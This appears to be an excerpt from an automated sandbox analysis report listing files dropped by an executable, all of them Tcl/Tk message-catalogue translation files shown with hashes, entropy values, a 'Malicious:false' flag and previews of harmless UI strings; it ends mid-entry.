                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4914
                                                                                                                                                                                                                              Entropy (8bit):4.6221938909259475
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nxLEpatioUqGBLbz4ME/XKKVN9R7S/0oYr9:epY3MkXKKxRu2r9
                                                                                                                                                                                                                              MD5:2203F65BCDA61BC15AEAC4F868C6D94A
                                                                                                                                                                                                                              SHA1:C4CC3975679D23892406E4E8971359A0775B1B86
                                                                                                                                                                                                                              SHA-256:C0F574B14068A049E93421C73873D750C98DE28B7B77AA42FE72CBE0270A4186
                                                                                                                                                                                                                              SHA-512:79F134FDAD3B12524D43BF9F59D3C04CAE30A95F591A51B82C8DF7CC8563BEA5D464AEECC457D9F60C04365E30459C447ED537AFC832BA25E1815DE06C2B81E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset de "&Abort" "&Abbruch".. ::msgcat::mcset de "&About..." "&\u00dcber...".. ::msgcat::mcset de "All Files" "Alle Dateien".. ::msgcat::mcset de "Application Error" "Applikationsfehler".. ::msgcat::mcset de "&Apply" "&Anwenden".. ::msgcat::mcset de "Bold" "Fett".. ::msgcat::mcset de "Bold Italic" "Fett kursiv".. ::msgcat::mcset de "&Blue" "&Blau".. ::msgcat::mcset de "Cancel" "Abbruch".. ::msgcat::mcset de "&Cancel" "&Abbruch".. ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.".. ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis".. ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen".. ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen".. ::msgcat::mcset de "Color" "Farbe".. ::msgcat::mcset de "Console" "Konsole".. ::msgcat::mcset de "&Copy" "&Kopieren".. ::msgcat::mcset de "
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (355), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8784
                                                                                                                                                                                                                              Entropy (8bit):4.334043617395095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:tVj/F+oxBHbkI8+xTqFt2zPJ0k63fRGIUvPXrfBNnzc+zIF7meUOT7GC8MO07S0g:fj9+AHlLoozHn7fBFrMVmehCAGb
                                                                                                                                                                                                                              MD5:780F863903BBDAA6C371EC0D3C7E6D59
                                                                                                                                                                                                                              SHA1:DF5D435E132BEE4C076A7FC577C8C275A8B68CD5
                                                                                                                                                                                                                              SHA-256:3F6F155864FE59A341BFD869735E54DD21CEE21BBD038433D9B271AD77BA3F7E
                                                                                                                                                                                                                              SHA-512:091965EE912513AE1943BE840A2E757188FBA6F760F7C47BE80D06313D59B051F183E3A29D4B1CEDE1F9E54CA3CA23D75FF2C3A3672A4E71FB56F0FA76F7FA0D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:## Messages for the Greek (Hellenic - "el") language...## Please report any changes/suggestions to:..## petasis@iit.demokritos.gr....namespace eval ::tk {.. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2".. ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...".. ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1".. ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2".. ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5".. ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7".. ::msgcat::mcset el \.."Cannot change to the directory \"%1\$s\".\nPermission denied." \.."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3377
                                                                                                                                                                                                                              Entropy (8bit):4.279601088621442
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:sQ7dw5bO0V3gqmCNyoKJ6iwp/uvENv4SKEcET2hsHFjr:n7dwNOc3RmOKJQcvEl4SK1ET2hYFjr
                                                                                                                                                                                                                              MD5:D48CFC9EC779085E8F6AAA7B1C40C89A
                                                                                                                                                                                                                              SHA1:0CF6253BFF39F40CA0991F9B06D3394BFEA21ED2
                                                                                                                                                                                                                              SHA-256:4A33B44B2E220E28EAAE7FAC407CAFE43D97C270DA58FA5F3B699A1760BFB2A4
                                                                                                                                                                                                                              SHA-512:C00EC0CFB48ABE621EF625C51952BCF177CE3BC7F0DEC5276EF84C9A97C7E014806B106EA8DEE202C43F8DD54ED7261A8D899E3EE12E3F37A90C387D864463AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset en "&Abort".. ::msgcat::mcset en "&About...".. ::msgcat::mcset en "All Files".. ::msgcat::mcset en "Application Error".. ::msgcat::mcset en "&Apply".. ::msgcat::mcset en "Bold".. ::msgcat::mcset en "Bold Italic".. ::msgcat::mcset en "&Blue".. ::msgcat::mcset en "Cancel".. ::msgcat::mcset en "&Cancel".. ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.".. ::msgcat::mcset en "Choose Directory".. ::msgcat::mcset en "Cl&ear".. ::msgcat::mcset en "&Clear Console".. ::msgcat::mcset en "Color".. ::msgcat::mcset en "Console".. ::msgcat::mcset en "&Copy".. ::msgcat::mcset en "Cu&t".. ::msgcat::mcset en "&Delete".. ::msgcat::mcset en "Details >>".. ::msgcat::mcset en "Directory \"%1\$s\" does not exist.".. ::msgcat::mcset en "&Directory:".. ::msgcat::mcset en "&Edit".. ::msgcat::mcset en "Effects".. ::msgcat::mcset en "Error: %1\$s".. ::msgcat::mcs
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):66
                                                                                                                                                                                                                              Entropy (8bit):4.262228832346611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:fEGp6fRyv//mGoW8vMKEQXyVn:sooyv//xoQOOn
                                                                                                                                                                                                                              MD5:3D41FC47CD9936F817EF9645D73A77ED
                                                                                                                                                                                                                              SHA1:E62BBE094B71CAF4A389DE3ECD84D2EEFBA33827
                                                                                                                                                                                                                              SHA-256:01238293356E82F1D298896491F8B299BB7DC9C34F299C9E756254C736DA612B
                                                                                                                                                                                                                              SHA-512:B92582C32C4D7CD9DE6571CBB6B93DD693A8B5A80645468E2D02B80C339BE2B95D5B4878A0DA9AFFE9E2F98A6C38AAE9CC1FF2440146D0ED128FE8C9A92EECDB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset en_gb Color Colour..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4035
                                                                                                                                                                                                                              Entropy (8bit):4.614759526381991
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:n6oXunu4/LQmI+nl0WemQ+uISIKk/2nibN5My/uXcFSZHBohy:n6oXuu4jJtlPemVuISIKkuniJS1Gy
                                                                                                                                                                                                                              MD5:3704A08985B0AA3C521FDF9C2DA59D97
                                                                                                                                                                                                                              SHA1:3F1E42C5697504B4DEE1EE314CD361B4203BF686
                                                                                                                                                                                                                              SHA-256:84B117857674A2426290946053A61316C5C8C6808F2C6EDF0ECC5C4A9C5C72AC
                                                                                                                                                                                                                              SHA-512:99FE97B10B1CA59DDA0385161E7C05F7D22424B6B1FB844138921EF94B2E9809D73EBC0062897D0DDE040CF92C96A6E4916CC9F3F02442AE2C4162858434B6BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset eo "&Abort" "&\u0108esigu".. ::msgcat::mcset eo "&About..." "Pri...".. ::msgcat::mcset eo "All Files" "\u0108iuj dosieroj".. ::msgcat::mcset eo "Application Error" "Aplikoeraro".. ::msgcat::mcset eo "&Blue" "&Blua".. ::msgcat::mcset eo "Cancel" "Rezignu".. ::msgcat::mcset eo "&Cancel" "&Rezignu".. ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u015dan\u011di al dosierujo \"%1\$s\".\nVi ne rajtas tion.".. ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujon".. ::msgcat::mcset eo "Cl&ear" "&Vakigu".. ::msgcat::mcset eo "&Clear Console" "&Vakigu konzolon".. ::msgcat::mcset eo "Color" "Koloro".. ::msgcat::mcset eo "Console" "Konzolo".. ::msgcat::mcset eo "&Copy" "&Kopiu".. ::msgcat::mcset eo "Cu&t" "&Eltondu".. ::msgcat::mcset eo "&Delete" "&Forigu".. ::msgcat::mcset eo "Details >>" "Detaloj >>".. ::msgcat::mcset eo "Directory \"%1\$s\" does not exi
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4024
                                                                                                                                                                                                                              Entropy (8bit):4.536517819515934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nN0T1Lt8ZYSih/aiik148aFscyTzoixccUTqjcg60Dx/H5:nN0BLSQUXy/o8re055
                                                                                                                                                                                                                              MD5:4765F3C055742530E4644771EBC6C69F
                                                                                                                                                                                                                              SHA1:8BEA722AC00522DEAA5B380AEEF4CA57D7A271BD
                                                                                                                                                                                                                              SHA-256:D2842B80F1B521EFF2D2656A69274B5F2A8F4F5831AF2E8EE73E3C37389F981F
                                                                                                                                                                                                                              SHA-512:9CA247F22797A1A1FCA42B5CDABF58262ED95EECDDD321CEB1440A60A4375923E0F511238F360D159EB5EED6F82CBBE0B8907A07CC77DB831BF97082932CD0FD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset es "&Abort" "&Abortar".. ::msgcat::mcset es "&About..." "&Acerca de ...".. ::msgcat::mcset es "All Files" "Todos los archivos".. ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n".. ::msgcat::mcset es "&Blue" "&Azul".. ::msgcat::mcset es "Cancel" "Cancelar".. ::msgcat::mcset es "&Cancel" "&Cancelar".. ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.".. ::msgcat::mcset es "Choose Directory" "Elegir directorio".. ::msgcat::mcset es "Cl&ear" "&Borrar".. ::msgcat::mcset es "&Clear Console" "&Borrar consola".. ::msgcat::mcset es "Color".. ::msgcat::mcset es "Console" "Consola".. ::msgcat::mcset es "&Copy" "&Copiar".. ::msgcat::mcset es "Cu&t" "Cor&tar".. ::msgcat::mcset es "&Delete" "&Borrar".. ::msgcat::mcset es "Details >>" "Detalles >>".. ::msgcat::mcset es "Directory \"%1\$s\"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4693
                                                                                                                                                                                                                              Entropy (8bit):4.640083757706223
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:najdLGoC0TXwqTwPRNQXfdHzAIX169ZZv6CpvgIPJupuupw6kWVVxn6/9Yv:nWdLGo2WiMn4t5pvbxuPtx6F6
                                                                                                                                                                                                                              MD5:BD795A1D95446BEE7AEB16FB6E346271
                                                                                                                                                                                                                              SHA1:38469DBD386C35B90EBE0A0FE2CE9F1AB5A5444A
                                                                                                                                                                                                                              SHA-256:893BEDCDAED4602898D988E6248B8BB0857DD66C06194B45F31340CA03D82369
                                                                                                                                                                                                                              SHA-512:B9BDDECB1DE2025C6C4027BF6228A14D5F573F5859ED3444298809266F06E6203F72004D589314C6529A2E198039355B4FD6160F87DA8F97B55E9F841B6C3F5A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset fi "&Abort" "&Keskeyt\u00e4".. ::msgcat::mcset fi "&About..." "&Tietoja...".. ::msgcat::mcset fi "All Files" "Kaikki tiedostot".. ::msgcat::mcset fi "Application Error" "Ohjelmavirhe".. ::msgcat::mcset fi "&Apply" "K\u00e4&yt\u00e4".. ::msgcat::mcset fi "Bold" "Lihavoitu".. ::msgcat::mcset fi "Bold Italic" "Lihavoitu, kursivoitu".. ::msgcat::mcset fi "&Blue" "&Sininen".. ::msgcat::mcset fi "Cancel" "Peruuta".. ::msgcat::mcset fi "&Cancel" "&Peruuta".. ::msgcat::mcset fi "Cannot change to the directory \"%1\$s\".\nPermission denied." "Ei voitu vaihtaa hakemistoon \"%1\$s\".\nLupa ev\u00e4tty.".. ::msgcat::mcset fi "Choose Directory" "Valitse hakemisto".. ::msgcat::mcset fi "Cl&ear" "&Tyhjenn\u00e4".. ::msgcat::mcset fi "&Clear Console" "&Tyhjenn\u00e4 konsoli".. ::msgcat::mcset fi "Color" "V\u00e4ri".. ::msgcat::mcset fi "Console" "Konsoli".. ::msgcat::mcset fi "&Copy" "K&opioi".. ::msgcat::mcs
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3877
                                                                                                                                                                                                                              Entropy (8bit):4.630737553723335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nByEWs/3lHFB9FamsIfSAzZ2eaISAxh0BRc3jC:nByEWaRNzsSSWonMAv
                                                                                                                                                                                                                              MD5:E279E5FFF03E1B8E9063ABC8A499A6BD
                                                                                                                                                                                                                              SHA1:80910911F6B4830BA4DCBA9A9EAD12C9F802DDC9
                                                                                                                                                                                                                              SHA-256:3F2CEB4A33695AB6B56E27F61A4C60C029935BB026497D99CB2C246BCB4A63C4
                                                                                                                                                                                                                              SHA-512:8333388E421AC3F342317BEBE352809B0B190EF8B044A0BAE2FE4051974D86008BAFDCB7098E9DC39A8D9E1E08FB87F54B9D3388AF2D0185FF913DB6788C5AB5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset fr "&Abort" "&Annuler".. ::msgcat::mcset fr "About..." "\u00c0 propos...".. ::msgcat::mcset fr "All Files" "Tous les fichiers".. ::msgcat::mcset fr "Application Error" "Erreur d'application".. ::msgcat::mcset fr "&Blue" "&Bleu".. ::msgcat::mcset fr "Cancel" "Annuler".. ::msgcat::mcset fr "&Cancel" "&Annuler".. ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.".. ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire".. ::msgcat::mcset fr "Cl&ear" "Effacer".. ::msgcat::mcset fr "Color" "Couleur".. ::msgcat::mcset fr "Console".. ::msgcat::mcset fr "Copy" "Copier".. ::msgcat::mcset fr "Cu&t" "Couper".. ::msgcat::mcset fr "Delete" "Effacer".. ::msgcat::mcset fr "Details >>" "D\u00e9tails >>".. ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4678
                                                                                                                                                                                                                              Entropy (8bit):4.7955991577265245
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nkCEz2TTrKmA17fzq/Hj+pUva+fQR/a5a/Thn5kU:kTqM17u/8NiMrhb
                                                                                                                                                                                                                              MD5:4F1610E0C73DAE668E3F9D9235631152
                                                                                                                                                                                                                              SHA1:63EE54A6C1A69B798C65C999D5F80A7AB252B6D8
                                                                                                                                                                                                                              SHA-256:E063AD7CA93F37728A65E4CD7C0433950F22607D307949F6CB056446AFEAA4FE
                                                                                                                                                                                                                              SHA-512:37F4B8A9CD020A77591C09AF40FBC2FA82107B2596D31B5F30CE6ECAA225417CF7A5C62FB7A93539B0D7E930D0A44F9BF2EE6BE113F831B0A72B229444672AFD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s".. ::msgcat::mcset hu "&About..." "N\u00e9vjegy...".. ::msgcat::mcset hu "All Files" "Minden f\u00e1jl".. ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba".. ::msgcat::mcset hu "&Blue" "&K\u00e9k".. ::msgcat::mcset hu "Cancel" "M\u00e9gsem".. ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem".. ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.".. ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa".. ::msgcat::mcset hu "Cl&ear" "T\u00f6rl\u00e9s".. ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol".. ::msgcat::mcset hu "Color" "Sz\u00edn".. ::msgcat::mcset hu "Console" "Konzol".. ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s".. ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s".. ::ms
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3765
                                                                                                                                                                                                                              Entropy (8bit):4.49679862548805
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nmU4xnonTjwUE5Xs6ZrT8BpXAg+Wr+u92C8t7mU9nUSs:nZ4FonFE58HBpXjr+fBJs
                                                                                                                                                                                                                              MD5:B74C54666A5A431A782DB691B4CA3315
                                                                                                                                                                                                                              SHA1:2BC63982C14BBA8A4C451CE31540181F40CE2216
                                                                                                                                                                                                                              SHA-256:806930F283FD097195C7850E3486B3815D1564529B4F8E5FA6D26F3175183BC1
                                                                                                                                                                                                                              SHA-512:8120E2FFD14E0A992E254796ADDC0DC995C921BE31688C0995D7A36FE82609D78791FEF73EAF5B14E2F0D40AD256AB8DAAA07C18E6950362B28E40B71E47C0B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset it "&Abort" "&Interrompi".. ::msgcat::mcset it "&About..." "Informazioni...".. ::msgcat::mcset it "All Files" "Tutti i file".. ::msgcat::mcset it "Application Error" "Errore dell' applicazione".. ::msgcat::mcset it "&Blue" "&Blu".. ::msgcat::mcset it "Cancel" "Annulla".. ::msgcat::mcset it "&Cancel" "&Annulla".. ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.".. ::msgcat::mcset it "Choose Directory" "Scegli una directory".. ::msgcat::mcset it "Cl&ear" "Azzera".. ::msgcat::mcset it "&Clear Console" "Azzera Console".. ::msgcat::mcset it "Color" "Colore".. ::msgcat::mcset it "Console".. ::msgcat::mcset it "&Copy" "Copia".. ::msgcat::mcset it "Cu&t" "Taglia".. ::msgcat::mcset it "Delete" "Cancella".. ::msgcat::mcset it "Details >>" "Dettagli >>".. ::msgcat::mcset it "Directory \"%1\$s\" does not ex
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):4.524344068436489
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nucQswBju0x0M4U2z9KSSOzZL5KhWTqGGIrlxXvhYbL/ZO5NT+T4kiLzzdDf1SDM:nLGa0x0Mp2KSHKSv2bL/ZO5u6nRfAXU9
                                                                                                                                                                                                                              MD5:E56229BAC5A8ABB90C4DD8EE3F9FF9F8
                                                                                                                                                                                                                              SHA1:7527D6C3C6C84BFF0E683FFA86A21C58458EB55D
                                                                                                                                                                                                                              SHA-256:0914FBA42361227D14FA281E8A9CBF57C16200B4DA1E61CC3402EF0113A512C7
                                                                                                                                                                                                                              SHA-512:13649DDB06DB4BA9E39BEAF828211086A519444DA9AB5CBDD1B88B29208388189A5141F75AD94B56A348EDDE534FFADE8B19B557CB988EA4ECC9A84B135D36C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset nl "&Abort" "&Afbreken".. ::msgcat::mcset nl "&About..." "Over...".. ::msgcat::mcset nl "All Files" "Alle Bestanden".. ::msgcat::mcset nl "Application Error" "Toepassingsfout".. ::msgcat::mcset nl "&Apply" "Toepassen".. ::msgcat::mcset nl "Bold" "Vet".. ::msgcat::mcset nl "Bold Italic" "Vet Cursief".. ::msgcat::mcset nl "&Blue" "&Blauw".. ::msgcat::mcset nl "Cancel" "Annuleren".. ::msgcat::mcset nl "&Cancel" "&Annuleren".. ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.".. ::msgcat::mcset nl "Choose Directory" "Kies map".. ::msgcat::mcset nl "Cl&ear" "Wissen".. ::msgcat::mcset nl "&Clear Console" "&Wis Console".. ::msgcat::mcset nl "Color" "Kleur".. ::msgcat::mcset nl "Console".. ::msgcat::mcset nl "&Copy" "Kopi\u00ebren".. ::msgcat::mcset nl "Cu&t" "Knippen".. ::msgcat::mcset nl "&Dele
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4932
                                                                                                                                                                                                                              Entropy (8bit):4.799369674927008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nXra9E310fwNCeVsvSmy6MZv8lWBTDGdZ3tojTyrEQmAUCIx4wBxZ:n7a9Q0fyw5MQWgP3uoZChB3
                                                                                                                                                                                                                              MD5:8CFA2E38822303FDCB55AE3277F0B81B
                                                                                                                                                                                                                              SHA1:447F28A5064FCEA019C60B3F9B6D50CD43C2D0E3
                                                                                                                                                                                                                              SHA-256:EACEB1F08DE0863CCF726881E07FE5B135EA09646C5253E0CBF7DDB987EB0D92
                                                                                                                                                                                                                              SHA-512:E38BA9059AFF55C2B22A4AE24D6A76149C76DBA8BF8646AE81D6E07D7ED490D0605034B29D9AC848E6685C8EC26A3DBE5B2EAF462B14D96376E80076FBE7082A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset pl "&Abort" "&Przerwij".. ::msgcat::mcset pl "&About..." "O programie...".. ::msgcat::mcset pl "All Files" "Wszystkie pliki".. ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie".. ::msgcat::mcset pl "&Apply" "Zastosuj".. ::msgcat::mcset pl "Bold" "Pogrubienie".. ::msgcat::mcset pl "Bold Italic" "Pogrubiona kursywa".. ::msgcat::mcset pl "&Blue" "&Niebieski".. ::msgcat::mcset pl "Cancel" "Anuluj".. ::msgcat::mcset pl "&Cancel" "&Anuluj".. ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.".. ::msgcat::mcset pl "Choose Directory" "Wybierz katalog".. ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107".. ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119".. ::msgcat::mcset pl "Color" "Kolor".. ::msgcat::mcset pl "Console" "Konsola".. ::msgcat::mcset pl "&Copy" "&Kopiu
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3987
                                                                                                                                                                                                                              Entropy (8bit):4.63232183429232
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nHOT1mM5qHHxiBHb3joTjtcp2UqMxweo6VvilCMKKXx9vjM:nHOT1mMQnwB/otcUUpGX6VPVoLjM
                                                                                                                                                                                                                              MD5:4018686F2A8E299D86BDB1478BC97896
                                                                                                                                                                                                                              SHA1:0EECE3D57F2EA5EECE8157B06F3AFB97E1F2551A
                                                                                                                                                                                                                              SHA-256:D687F71F0432BB0D02EFDF576E526D2C19D4136F76C41A3224A2F034168F3F34
                                                                                                                                                                                                                              SHA-512:4D730068B2A21E1D6004205B10A9D0D5EE9683FEB03B6FB673E8B9B94ED6BE468086A52DFE97C4DBF35A07CBB2C5E276DF0952A06C78E029D53D796CB6FCC8DF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset pt "&Abort" "&Abortar".. ::msgcat::mcset pt "About..." "Sobre ...".. ::msgcat::mcset pt "All Files" "Todos os arquivos".. ::msgcat::mcset pt "Application Error" "Erro de aplica\u00e7\u00e3o".. ::msgcat::mcset pt "&Blue" "&Azul".. ::msgcat::mcset pt "Cancel" "Cancelar".. ::msgcat::mcset pt "&Cancel" "&Cancelar".. ::msgcat::mcset pt "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.".. ::msgcat::mcset pt "Choose Directory" "Escolha um diret\u00f3rio".. ::msgcat::mcset pt "Cl&ear" "Apagar".. ::msgcat::mcset pt "&Clear Console" "Apagar Console".. ::msgcat::mcset pt "Color" "Cor".. ::msgcat::mcset pt "Console".. ::msgcat::mcset pt "&Copy" "Copiar".. ::msgcat::mcset pt "Cu&t" "Recortar".. ::msgcat::mcset pt "&Delete" "Excluir".. ::msgcat::mcset pt "Details >>" "Detalhes >>".. ::msgcat::mcset pt "D
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8620
                                                                                                                                                                                                                              Entropy (8bit):4.477728981060218
                                                                                                                                                                                                                              Encrypted:false
